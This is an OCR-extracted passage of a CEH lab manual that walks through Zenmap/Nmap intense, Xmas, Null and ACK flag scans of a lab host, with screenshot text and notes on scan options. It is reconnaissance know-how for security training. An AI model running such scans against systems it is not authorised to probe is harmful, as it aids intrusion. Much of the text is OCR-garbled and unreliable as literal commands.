  • 43. Module 03 - Scanning Networks T = IZenmap Scan Iools £rofile Help Scan! CancelTarget: Command: nmap -T4 -A -v 10.C.0.4 Details ‫י‬‫כ‬ ‫פ‬ Nrr^p Output | Ports / Hosts | Topolog) JHost Details | Scans nmap •T4 •A ■v 10.0.0.4 M icrosoft HTTPAPI h ttpd 2.0 netbios-ssn nctbios ssn h ttp 1 3 9 /tc p open 4 4 5 /tc p open 5 3 5 7 /tc p open (SSOP/UPnP) |_ h t t p ‫־‬ m « th o d s: No A llo w o r P u b lic h «a d« r in OPTIONS re sp o n se ( s t a tu s code 503) |_ rr ttp -title : Service Unavailable ‫ח‬ M ic r o s o ft Windows RPC M ic ro s o ft Windows RPC M ic r o s o ft Windows RPC M ic r o s o ft Windows RPC M ic r o s o ft Windows RPC ;0 7 :1 0 ( M ic r o s o ft) 4 9 1 5 2 /tc p open 4 9 1 5 3 /tc p open 4 9 1 5 4 /tc p open 4 9 1 5 5 /tc p open 4 9 1 5 6 /tc p open MAC A d d re s s : 0( m srpc m srpc m srpc m srpc m srpc ______________ 1 5 :5D: D e v ic e ty p e : g e n e ra l purpose R u n n in g : M ic r o s o ft WindONS 7 | 2008 OS CPE: c p « : / o : ‫׳‬n ic ro s o ft:w in d o w s _ 7 c p e :/ o :» ic ro s o ft:w in d o w s _ s e rv e r_ 2 0 0 8 : : s p l (?‫ל‬ d e t a ils : M ic r o s o ft Windows 7 o r Windows S e rv e r 2008 SP1 U p tim e g u e ss: 0 .2 5 6 days (s in c e F r i Aug ?4 0 9 :2 7 :4 0 2012) Nttwort Distance; 1 hop TCP Sequence P r e d ic t io n : D if f ic u lt y - 2 6 3 (O ood lu c k ! ) IP IP S equence G e n e ra tio n : In c re m e n ta l S e rv ic e I n f o : OS: W indow s; CPE: c p e :/o :n ic r o s c ft:w in d o w s OS < Host 10.0.0.4‫׳‬ ‫׳‬ Filter Hosts FIGURE 6.6:The Zenmap mainwindowwiththeNmap Outputtab forIntense Scan 10. Click the Ports/Hosts tab to display more information on the scan results. 11. Nmap also displays die Port, Protocol, State. Service, and Version of the scan. T‫־‬TZenmap Scan Cancel Scan Iools Profile Help Target: 10.0.0.4 Command: nmap -T4 -A -v 10.0.0.4 Nmgp Outp u ( Tu[.ulu1jy Hu^t Details Sk m :. Minoaoft Windows RPCopen rmtpc13S tcp Microsoft HTTPAPI httpd 2.0 (SSD Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC netbios-ssn netbios-ssn http msrpc msrpc msrpc msrpc msrpc open open open open open open open open tcp tcp tcp 139 445 5337 49152 tcp 49153 tcp 49154 tcp 49155 tcp 49156 tcp Services OS < Host 10.0.0.4‫״״‬ aThe options available to control target selection: ■ -iL <inputfilename> ■ -1R <num hosts> ■ -exclude <host1>[,<host2>[,...]] ■ -excludefile <exclude file> Q The following options control host discovery: ■ -sL (list Scan) ■ -sn (No port scan) ■ -Pn (No ping) ■ ■PS <port list> (TCP SYN Ping) ■ -PA <port list> (TCP ACK Ping) ■ -PU <port list> (UDP Ping) ■ -PY <port list> (SCTP INTT Ping) ■ -PE;-PP;-PM (ICMP Ping Types) ■ -PO <protocol list> (IP Protocol Ping) ■ -PR (ARP Ping) ■ —traceroute (Trace path to host) ■ -n (No DNS resolution) ■ -R (DNS resolution for all targets) ■ -system-dns (Use system DNS resolver) ■ -dns-servers <server1>[,<server2>[,. ..]] (Servers to use for reverse DNS queries) FIGURE 6.7:The Zenmapmainwindowwiththe Ports/Hosts tab forIntense Scan C E H Lab M anual Page 126 Ethical H acking and Counterm easures Copyright © by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited
  • 44. Module 03 - Scanning Networks 12. Click the Topology tab to view Nmap’s topology for the provided IP address in the Intense scan Profile. FIGURE 6.8:The Zenmap mainwindowwithTopology tab fot Intense Scan 13. Click the Host Details tab to see die details of all hosts discovered during the intense scan profile. r ^ r ° r x 1Zenmap Scan Conccl Scan lools Profile Help Target: 10.0.0.4 Command: nmap -T4 -A -v 10.0.0.4 Scan?Hosts || Services I I Nmap Output I Porte / Hoctt | Topologyf * Host Detail‫:׳‬ 13.0.C.4 H Host Status S ta te : u p O p e n p o r t c Q Filtered poits: 0 Closed ports: 991 Scanned ports: 1000 Uptime: 22151 Last boot: FriAug 24 09:27:40 2012 B Addresses IPv4: 10.0.0.4 IPv6: Not available MAC: 00:15:50:00:07:10 - Operating System Name: Microsoft Windows 7or Windows Seiver 2008SP1 # Accuracy: Ports used OS < Host 10.0.0.4-‫־׳‬ Filter Hosts FIGURE 6.9:The Zenmap mainwindowwithHost Detailstab forIntense Scan 7 ^ t By default, Nmap performs a host discovery and then a port scan against each host it determines to be on line. 7^ ‫׳‬ By default, Nmap determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32). Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 127
  • 45. Module 03 - Scanning Networks 14. Click the Scans tab to scan details for provided IP addresses. 1- 1° ‫׳‬ xZenmap CancelIntense scanProfile: Scan Tools Profile Help Target: 10.0.0.4 Command: nmap •T4 •A -v 100.0.4 Hosts |[ Services | Nmap Output J Ports.' Hosts | Topology | Host Detail;| S:an; Sta!us Com‫׳‬r»ard Unsaved nmap -14-A •v 10.00.4 OS < Host 100.04 if■ Append Scan » Remove Scan Cancel Scan FIGURE 6.10:The Zenmapmainwindowwith Scantab forIntense Scan 15. Now, click the Services tab located in the right pane of the window. This tab displays the list of services. 16. Click the http service to list all the HTTP Hostnames/lP addresses. Ports, and their states (Open/Closed). * ‫ד‬‫־‬ ‫י‬ ° ‫מ‬‫ז‬Zenmap Scan Tools Profile Help Target: Comman 10.0.0.4 v ] Profile: Intense scan v | Scan| Cancel d: nmap •T4 -A -v 10.0.0.4 ‫ו‬ Hosts | Services Nmap Output Ports / Hosts Topology |HoctDrtaik | S^ant < Hostname A Port < Protocol « State « Version i 10.0.04 5357 tcp open Microsoft HTTPAPI hctpd 2.0 (SSI <L Service msrpc n e t b i o s 5 5 ‫־‬n aNmap offers options for specifyingwinch ports are scanned and whether the scan order is random!2ed or sequential. aIn Nmap, option -p <port ranges> means scan only specified ports. Q In Nmap, option -F means fast (limited port) scan. FIGURE 6.11:The Zenmap mainwindowwith Servicesoption forIntense Scan Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 128
  • 46. Module 03 - Scanning Networks 17. Click the msrpc service to list all the Microsoft Windows RPC. ‫י‬‫ם‬1‫ז‬ ‫־‬ x ‫׳‬Zenmap 10.0.0.4 ‫י‬ Profile: Intense scan Scan] Scan Iools Profile Help Target: Command: nmap -T4 -A -v 10.0.0.4 Topology | Host Details^ScansPorts / HostsNmcp Output 4 Hostname *‫־‬ Port < Protocol * State « Version • 100.0.4 49156 Up open Mkroioft Windoro RPC • 100.0.4 49155 tcp open Microsoft Windows RPC • 100.0.4 49154 tcp open Microsoft Windows RPC • 100.04 49153 tcp open Microsoft Windows RPC • 100.04 49152 tcp open Microsoft Windows RPC • 100.0.4 135 tcp open Microsoft Windows RPC Services Service http netbios-ssn In Nmap, Option — port-ratio <ratio><dedmal number between 0and 1> means Scans all ports in nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0and 1.1 FIGURE 6.12 The Zenmap mainwindowwith msrpc ServiceforIntense Scan 18. Click the netbios-ssn service to list all NetBIOS hostnames. TTTZenmap Scan Cancel Scan Icols Erofile Help Target: 10.0.0.4 Command: nmap -T4 -A -v 10.0.0.4 Topology Host Deoils ScansPorts f HostsNmap Output open open 445 tcp 139 tcp 100.0.4 100.0.4 Hosts || Services | Service http msrpc FIGURE 6.13:The Zenmapmainwindowwithnetbios-ssn ServiceforIntenseScan 19. Xmas scan sends a TCP frame to a remote device with URG, ACK, RST, SYN, and FIN flags set. FIN scans only with OS TCP/IP developed h id In Nmap, Option -r means don't randomi2e ports. TASK 2 Xmas Scan Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 129
  • 47. Module 03 - Scanning Networks according to RFC 793. The current version of Microsoft Windows is not supported. 20. Now, to perform a Xmas Scan, you need to create a new profile. Click Profile ‫>־‬ New Profile or Command Ctrl+P y ‫׳‬ Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. m The option —max- retries <numtries> specifies the maximum number ofport scan probe retransmissions. 21. On the Profile tab, enter Xmas Scan in the Profile name text field. Profile Editor ‫!׳‬map -T4 -A -v 10.0.0.4 Help Description The description is a full description 0♦v»hac the scan does, which may be long. C a n e d 0S a v e C h a n g e s Scan | Ping | Scripting | Target | Source[ Other | TimingProfile XmasScanj Profile Information Profile name D * c e r ip tio n m The option -host- timeout <time> gives up on slow target hosts. FIGURE 6.15:The Zenmap ProfileEditorwindowwiththe Profiletab C E H Lab M anual Page 130 Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited.
  • 48. Module 03 - Scanning Networks 22. Click the Scan tab, and select Xmas Tree scan (‫־‬sX) from the TCP scans: drop-down list. 1_T□ ' xProfile Editor !map -T4 -A -v 10.0.0.4 Help Enable all ad/anced/aggressive options Enable OSdetection (-0). version detection (-5V), script scanning (- sCMand traceroute (‫־־‬traceroute). Scan | Ping | Scripting | Target | Source | Other TimingProfile 10.00.4 None FI None ACK scan (-sA) ‫׳‬ FINscan ( sF) Mamon scan (-sM) Null scan (-sN) TCP SYN scan (-5S) TCPconnect >can (‫»־‬T) . Window scan (-sW) | Xmas Treescan (‫־‬sX) Sun optk>m Target? (optional): TCP scam Non-TCP scans: Timing template: □ Version detection (-sV) ‫ח‬ Idle Scan (Zombie) (-si) □ FTP bounceattack (-b) □ Disable reverseDNS resc ‫ם‬ IPv6 support (■6) Cancel 0SaveChanges FIGURE 6.16:The Zenmap ProfileEditorwindowwiththe Scantab 23. Select None in die Non-TCP scans: drop-down list and Aggressive (‫־‬ T4) in the Timing template: list and click Save Changes ‫י‬‫־‬ | ‫ם‬ ^1Profile Friitor nmap •sX •T4 -A ■v 10.0.0.4 Help Enable all ad/anced/aggressive options Enable OSdetection (-0). version detection (-sV), script scanning (- sQ and traceroute(--traceroute). Ping | Scripting [ Target Source | Other | TimingScarProfile Scan option* Target? (optional): 1D.0D.4 TCP scan: Xmas Tlee scan (‫־‬sX) | v | Non-TCP scans: Timing template: None [v‫׳‬ ] Aggressive(-T4) [v | @ E n a b le all a d v a n c e d / a g g r e s s v e o p tio n s ( -A ) □ Operating system detection (•O) O Version detection (-sV) □ Idle Scan (Zombie) (-51) □ FTP bounceattack (-b) O Disable reverseDNS resolution (‫־‬n) ‫ח‬ IPv6 support (-6) Cancel 0SaveChanges FIGURE 6.17:The Zenmap ProfileEditorwindowwiththe Scantab 24. Enter the IP address in die Target: field, select the Xmas scan opdon from the Profile: held and click Scan. UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan (‫־‬sS) to check both protocols during the same run. Q Nmap detects rate limiting and slows down accordingly to avoid flooding the networkwith useless packets that the target machine drops. Q You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using ‫־־‬ host-timeout to skip slow hosts. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 131
  • 49. Zenmap Module 03 - Scanning Networks Scan Tools Profile Help Target: 10.0.0.4 |v | Profile- | Xmas Scan | v | |Scan| Cancel | Command: nmap -sX -T4 -A -v 100.0/ ( Hosts || Services | Nmap Output Potts/Hosts | Topology Host Details j Scans 05 < Host A V 1 | Details] Filter Hosts In Nmap, option -sY (SCTPINIT scan) is often referred to as half-open scanning, because you donft open a full SCTP association. You send an INIT chunk, as ifyou were going to open a real association and then wait for a response. FIGURE 6.18:The ZenmapmainwindowwithTarget and Profileentered 25. Nmap scans the target IP address provided and displays results on the Nmap Output tab. i z cZenmap 10.0.0.4 v l Profile. Xmas Scan |Scani| Scan Tools Profile Help Target Command: nmap -sX -T4 -A -v 100.0/ N-nap Output Ports / Hosts | Topology Host Details | Scans nmap -sX -T4 -A -v 10.0.0.4 S ta r t in g Nmap 6 .0 1 ( h ttp ://n m a o .o r g ) a t 2 0 1 2 -0 8 -2 4 N < F ‫ל‬ lo a d e d 9 3 s c r i p t s f o r s c a n n in g . NSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 6 :2 9 S ca n n in g 1 0 .0 .0 .4 [1 p o r t] C om pleted ARP P in g Scan a t 1 6 :2 9 , 0 .1 5 s e la p s e d (1 t o t a l h o s ts ) I n i t i a t i n g P a r a lle l DMS r e s o lu t io n o f 1 h o s t, a t 1 6 :2 9 co m p le te d P a r a lle l dns r e s o lu t io n o f l n o s t. a t 1 6 :2 9 , 0 .0 0 s e la p s e d I n i t i a t i n g XMAS Scan a t 1 6:2 9 S c a n rin g 1 0 .0 .6 .4 [1 0 9 0 p o r ts ] In c r e a s in g send d e la y f o r 1 0 .0 .0 .4 fro m 0 t o 5 due t o 34 o u t o f 84 d ro pp ed pro & e s s in c e la s t in c re a s e . Com pleted XMAS Scan a t 1 6 :3 0 , 8 .3 6 s e la p s e d :10 0 0 t o t a l p o r ts ) I n i t i a t i n g S c rv ic e scon ot 16:30 I n i t i a t i n g OS d e te c tio n ( t r y # 1 ) a g a ir s t 1 0 .0 .0 .4 NSE: S c r ip t s c a n n in g 1 0 .0 .0 .4 . I n i t i a t i n g MSE a t 1 6 :3 0 Com pleted NSE a t 1 6 :3 0 , 0 .0 0 s e la p s e d Nnap scon r e p o r t f o r 1 0 .0 .0 .4 H ost i s up (0 .e 0 0 2 0 s la te n c y ) . ServicesHosts OS « Host * 10.0.0.4 £Q! When scanning systems, compliant with this RFC text, any packet not containing SYN, RST, or ACK bits results in a returned RST, if the port is closed, and no response at all, if the port is open. aThe option, -sA (TCP ACK scan) is used to map out firewall rulesets, determiningwhether they are stateful or not and which ports are filtered. FIGURE 6.19: The Zenmap mainwindowwiththeNmap Outputtab 26. Click the Services tab located at the right side of die pane. It displays all die services o f that host. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 132
  • 50. Module 03 - Scanning Networks 1=0‫־‬Zenmap 10.0.0.4 ^ Profile Xmas Scan ‫'י‬ | | Scan | Scan Iools Profile Help Target: Command: nmap -sX -T4 -A -v 10.0.0.4 Nmap Output Ports / Hosts | Topology | Host Dttails | Scans Detailsnmap -sX T4 -A -v 10.0.0.4 ‫ח‬S ta r t in g Nmap 6 .0 1 ( h ttp ://n m a p .o r g ) a t 2 0 1 2*0 8 -2 4 : Loaded 03 s c r ip t s f o r sca n nin g. NSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P ir g Scan a t 1 6 :2 9 S c a n rin g 1 0 .0 .0 .4 [1 p o r t ] m C om pleted ARP P in g Scan a t 1 6 :2 9 , 8 .1 5 s e la p s e d (1 t o t a l h o s ts ) I n i t i a t i n g 3a r a l l e l DNS r e s o lu t io n o f 1 h o s t, a t 1 6 :2 9 C om pleted P a r a lle l DNS r e s o lu t io n 0-f 1 n e s t, a t 1 6 :2 9 , 0 .0 0 s e la p s e d I n i t i a t i n g XMAS Scan a t 1 6:2 9 S c a n rin g 1 0 .0 .0 .4 [1 0 0 0 p o r ts ] In c r e a s in g send d e la y f o r 1 0 .0 .0 .4 fro m e t o 5 due t o 34 o u t o f 84 d ‫־׳‬opped p ro o e s s in c e la s t in c re a s e . C om pleted XHAS Scan a t 1 6 :3 0 . 8 .3 6 s e la p s e d (1 0 0 0 t o t a l p o r ts ) I n i t i o t i n g S e rv ic e scan at 16:30 I n i t i a t i n g OS d e te c tio n ( t r y # 1 ) a g a in s t 1 0 .0 .0 .4 NSE: S c r ip t s c a n n in g 1 0 .0 .0 .4 . I n i t i a t i n g USE a t 1 6:30 C om pleted NSE a t 1 6 :3 0 , 0 .0 e s e la p s e d N n a p s c a n r e p o r t f o r 1 0 . 0 . 0 . 4 H ost i s up (0 .0 0 0 2 0 s la t e n c y ) . V Hosts | Services | FIGURE 6.20: Zenmap MainwindowwithServicesTab 27. Null scan works only if the operating system’s TC P/IP implementation is developed according to RFC 793.111 a 111111scan, attackers send a TCP frame to a remote host with NO Flags. 28. To perform a 111111 scan for a target IP address, create a new profile. Click Profile ‫>־‬ New Profile or Command Ctrl+P Zenmap v Scan |Cancel |[ New ProfJeor Command CtrkP | nas Scan 9 £dit SelectedProf<e Qrl+E | Hosts || Scrvncct Nmap Output Portj / Hosts | Topology] Host D e to S c e n t OS « Host w 10.0.0.4 FIGURE 6.21:The Zenmapmainwindowwiththe NewProfileorCommand option S T A S K 3 Null Scan The option Null Scan (‫־‬sN) does not set any bits (TCP flagheader is 0). m The option, -sZ (SCTP COOKIE ECHO scan) is an advance SCTP COOKIE ECHO scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports but send an ABORT if the port is closed. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 133
  • 51. Module 03 - Scanning Networks 29. On die Profile tab, input a profile name Null Scan in the Profile name text field. L ^ IProfile Editor n m a p -s X -T 4 - X -v 1 0.0.0.4 Help Profile name This is how the profile v/ill be identfied in the drop-down combo box in the scan tab. Profile Scan | Ping | Scripting | Target| Source | Othc | Timing^ Profile Information Profile name | Null Scanj~~| D e s c r ip tio n a The option, -si <zombie host>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target. FIGURE 622:The Zenmap Profile EditorwiththeProfiletab 30. Click die Scan tab in the Profile Editor window. Now select the Null Scan (‫־‬sN) option from the TCP scan: drop-down list. Profile Editor nmap -eX -T4 -A -v 10.0.0.4 H e lp Profle name Thisis how the profile will be identified n the drop-down combo box n the scan tab. Cancel Save Changes Profile] Scan | Ping | Scripting| larget | Source Jther Timing Scan options Targets (optional): 1C.0.04 TCP scan: XmasTree scan (-sX) |v Non-TCP scans: None Timing template: ACKscen ( sA) [Vj Enable all advanced/aggressu FN scan (‫־‬sF) □ Operating system detection (‫־‬ Maimon «can (•?M) □ Version detection (■sV) Null scan (•sN) (71 Idle Scan (Zombie) (•si) TCP SYN scan(-sS) O FTP bounce attack (-b) TCP connect scan (‫־‬sT) (71 Disable reverse DNSresolutior Wincow scan (‫־‬sW) 1 1IPy6 support (-6) Xma; Tree !can (-sX) FIGURE 6.23:The ZenmapProfile Editorwiththe Scantab 31. Select None from the Non-TCP scans: drop-down field and select Aggressive (-T4) from the Timing template: drop-down field. 32. Click Save Changes to save the newly created profile. m The option, -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so m ost servers have ceased supporting it. The option, -r (Don't randomize ports): By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 134
  • 52. Module 03 - Scanning Networks ' - I T - 'Profile Editor |Scan[ Help Disable reverse DNSresolution Neer do reverse DNS. This can slash scanning times. £oncel Erj SaveChange* nmap -sN -sX -74 -A -v 10.0.0.4 P r o file S ca n P in g | S c r ip tin g | T a rg e t | S o ir e e [ C t h c i | T im in g Scan options Targets (opbonal): 10.0.0.4 TCP scan: Nul scan (•sN) V Non-TCP scans: None V Timing template: Aggressive (-T4) V C Operating system detection (-0) [Z Version detection (-5V) I Id le S c a n ( Z o m b ie ) (-si) Q FTP bounce attack (-b) I ! D is a b le re v e rse D N S r e s o lu t io n (-n ) □ IPv6 support (-6) FIGURE 6.24:The ZenmapProfile Editorwiththe Scantab 33. 111 the main window of Zenmap, enter die target IP address to scan, select the Null Scan profile from the Profile drop-down list, and then click Scan. In Nmap, option — version-all (Try every single probe) is an alias for -- version-intensity 9, ensuring that every single probe is attempted against each port. m The option,-‫־‬top- ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater. Zenmap Null ScanProf1‫:•י‬ Scfln Iools Erofile Help Target | 10.0.0.4 Command: nmap -sN •sX •T4 -A *v 10.00.4 Topology | Host Detais ( ScansPorts / HostsNmap OutpjtServicesHosts < Port < Prctoccl < State < Service < VersionO S < H o s t *U 10.00.4 Filter Hosts Q The option -sR (RPC scan), method works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up. FIGURE 6.25:The Zenmap mainwindowwithTarget and Profileentered 34. Nmap scans the target IP address provided and displays results in Nmap Output tab. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 135
  • 53. Module 03 - Scanning Networks B Q uZenmap Scan Tools Profile Help Scan! Cancelv Profile: Null ScanTarget 10.0.0.4 C o m m a n d : n m a p - s N - T 4 - A - v 10.C.0.4 Details ‫פן‬ Nmap Output | Ports/ Hosts ] Topology [ Host Details | ScansServicesHosts nmap -sN •T4 •A-v 10.0.04 ‫ח‬ OS < Host IM 10.0.0.4 S ta r t in g Mmap 6 .0 1 ( h t t p : / / n 1ra p .o rg ) a t 2012 0 8 24 N S t: Loaded 93 s c r ip t s f o r s c a n n in g . NSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 6 :4 7 S ca n n in g 1 0 .6 .0 .4 [1 p o r t] C o n p le te d ARP P in g Scan a t 1 6 :4 7 , 0 .1 4 s e la p s e c (1 t o t a l h o s ts ) I n i t i a t i n g P a r a lle l DNS r e s o lu t io n o f 1 h o s t, a t 1 5:4 7 C o n p le te d P a r a lle l DNS r e s o lu t io n o-F 1 h o s t, a t 1 6 :4 7 , 0 .2 8 s e la p s e ti i n i t i a t i n g n u l l scan a t 1 6 :4 7 S ca n n in g 1 0 .0 .0 .4 [1 0 0 0 p o r ts ] In c r e a s in g send d e la y f o r 1 0 .0 .0 .4 -from 0 to 5 due t o 68 o u t o f 169 d ro pp ed p ro be s s in c e la s t in c re a s e . C o n p le te d NULL Scan a t 1 6 :4 7 , 7 .7 B s e la p s e d (1 0 0 0 t o t a l p o r ts ) I n i t i a t i n g S e rv ic e scan a t 1 6 :4 7 I n i t i a t i n g OS d e te c tio n ( t r y * l ) a g a in s t 1 0 .0 .0 .4 NSE: S c r ip t sc a n n in g 1 0 .0 .0 .4 . I n i t i a t i n g NSE a t 1 6 :4 7 C o n p le te d NSE a t 1 6 :4 7 , 0 .0 0 s e la p s e c Nmap scan r e p o r t f o r 1 0 .0 .0 .4 H o st is up ( 0 . 000068s la te n c y ) . Filter Hosts FIGURE 6.26: The Zenmap mainwindowwith theNmap Outputtab 35. Click the Host Details tab to view the details of hosts, such as Host Status, Addresses. Open Ports, and Closed Ports ‫׳‬ - [ n r x 'Zenmap CancelNull ScanProfile: Scan Tools £rofle Help Target 10.0.0.4 C o m m a n d : n m a p - s N - T 4 • A - v 10.0.0 .4 Nmap Output | Ports/ Hosts | Topology Host Details | ScansSen/icesHosts - 10.0.0.4! ie B Host Status State: up Open ports: 0 ports: 0 Closed ports: 1000 Scanned ports: 1000 Up tirre: Not available Last boot: Not available S Addresses IPv4: 10.0.0.4 IPv6: N o t a v a ila b le MAC: 00:15:5D:00:07:10 • Com m ents OS « Host * 10.0.0.4 Filter Hosts FIGURE 627: ‫׳‬Hie Zenmap mainwindowwiththe Host Detailstab 36. Attackers send an ACK probe packet with a random sequence number. No response means the port is filtered and an RST response means die port is not filtered. The option -version- trace (Trace version scan activity) causes Nmap to pnnt out extensive debugging info about what version scanning is doing. It is a subset of what you get with —packet-trace, T A S K 4 ACK Flag Scan C E H Lab M anual Page 136 Ethical H acking and Counterm easures Copyright © by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited
  • 54. Module 03 - Scanning Networks 37. To perform an ACK Flag Scan for a target IP address, create a new profile. Click Profile ‫>־‬ New Profile or Command Ctrl+P. ! ^ □ T 0 E Zenmap Ctrl+Efj?l Edit Selected Profile Command: !!mop ■v» ■n* ‫**־‬ • v Porte / Hoete Topology | Hod Details JScantNmip Ojtput 4 Po‫׳‬t 4 Protocol 4 S tatt 4 Service < Vtrsicn Services ]Hoete OS < Host IM 10.0.0.4 Filter Hosts m The script: —script- updatedb option updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap — script-updatedb. FIGURE 6.28:The Zenmapmainwindowwiththe NewProfileorCommand option 38. On the Profile tab, input ACK Flag Scan in the Profile name text field. ‫־‬r a nProfile Editor nmap -sN -T4 -A -v 10.0.0.4 Help Description The descrption isafull description of what the scan does, which may be long. £ancel 0 SaveChanges TimingProfile [scan | Ping | Scripting | Target | Soiree[ Cthei | Profile Information Profile name |ACK PagScanj Description FIGURE 6.29:The Zenmap ProfileEditorWindowwiththe Profile tab 39. To select the parameters for an ACK scan, click the Scan tab in die Profile Editor window, select ACK scan (‫־‬sA) from the Non-TCP scans: drop-down list, and select None for all die other fields but leave the Targets: field empty. The options: -min- parallelism <numprobes>; -max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever- changing ideal parallelism based on network performance. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 137
  • 55. Module 03 - Scanning Networks ‫׳‬x! - ! □ ‫י‬Profile Editor [ScanJ Help E n a b le a ll a d v a n c e d , a g g re s s iv e o p tio n s Enable OSdetection (-0), version detection (-5V), script scanning (■ sC), and traceroute (‫־־‬ttaceroute). £ancel Q Save Changes n m a p - s A -sW -T 4 - A - v 10.0.0.4 Profile | Scan Ping Scnpting T3rg=t Source Other Timing Scan options Targets (optional): 10004 TCP scan: ACK scan (-sA) |v | Non-TCP scans: None Timing template: ACKscan( sA) [34 Enable all advanced/aggressi FIN scan (-sF) □ Operating system detection (- Maimon scan (-sM) □ Version detection (-5V) Null scan (-sNl O Idle Scan (Zombie) (‫־‬si) TCP SYN scan (-5S) □ FTP bounce attack (‫־‬b) TCP connect scan (-sT) f l Disable reverse DNSresolutior Vbincov scan (-sW) 1 1IPv6support (-6) Xmas Tree scan (-5X) The option: —min-rtt- timeout <time>, —max-rtt- timeout <time>, —initial- rtt-timeout <t1me> (Adjust probe timeouts). Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes. FIGURE 6.30:The Zenmap ProfileEditorwindowwiththe Scantab 40. Now click the Ping tab and check IPProto probes (-PO) to probe the IP address, and then click Save Changes. Profile Editor [Scan]n m a p - s A -sNJ -T 4 - A - v - P O 1 0 0 .0 .4 Help I C M P ta m « £ ta m p r# q u * :t Send an ICMP timestamp probe to see i targets are up. Profile Scan Ping Scnpting| Target | Source | Other Timing Ping options □ Don't ping before scanning (‫־‬Pn) I I ICMP ping (-PE) Q ICMP timestamp request (-PP) I I ICMP netmask request [-PM) □ ACK ping (-PA) □ SYNping (-PS) Q UDPprobes (-PU) 0 jlPProto prcb«s (-PO)i (J SCTP INIT ping probes (-PY) Cancel Save Changes G The Option: -max- retries <numtries> (Specify the maximum number of port scan probe retransmissions). When Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simplylost on the network. FIGURE 6.31:The Zenmap ProfileEditorwindowwiththe Pmgtab 41. 111 the Zenmap main window, input die IP address of the target machine (in diis Lab: 10.0.0.3), select ACK Flag Scan from Profile: drop-down list, and then click Scan. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 138
  • 56. Module 03 - Scanning Networks £ 3 The option: -‫־‬host- timeout <time> (Give up on slow target hosts). Some hosts simply take a long time to scan. Tins may be due to poody performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time. 42. Nmap scans die target IP address provided and displays results on Nmap Output tab. The option: —scan- delay <time>; --max-scan- delay <time> (Adjust delay between probes).This option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting. 43. To view more details regarding the hosts, click die Host Details tab X ‫ן‬ Zenmap r CancelACK Flag ScanProfile: Sc$n Tools £rofle Help Target: 10.0.0.4 Command: nmap -sA -P0 10.0.0.4 ScansHost Details Details Nmap Output j Ports/Hosts[ Topology nmap -sA -PO 10D.0.4 S ta rtin g ^map 6.01 ( h ttp ://n m a p .o rg ) a t 2012-08-24 17:03 In d ia Sta nd a rd T in e Nmap scan re p o rt fo r 1 0 .0 .0 .4 Host i s u9 (0.00000301 la t e n c y ). A ll 1000 scanned ports on 10.0.0.4 are u n filte re d WAC Address: 30:15:50:00:07:10 (M ic ro s o ft) Nmap d on e: 1 IP a dd re ss (1 h o s t u p) sca nn ec in 7 .5 7 seconds Sen/icesHosts OS < Host * 10.0.0.4 Filter Hosts FIGURE 6.33: The Zenmap mainwindowwith theNmap Outputtab ‫ם‬‫־‬Zenmap CancelScan ‫פב‬ACK Flag 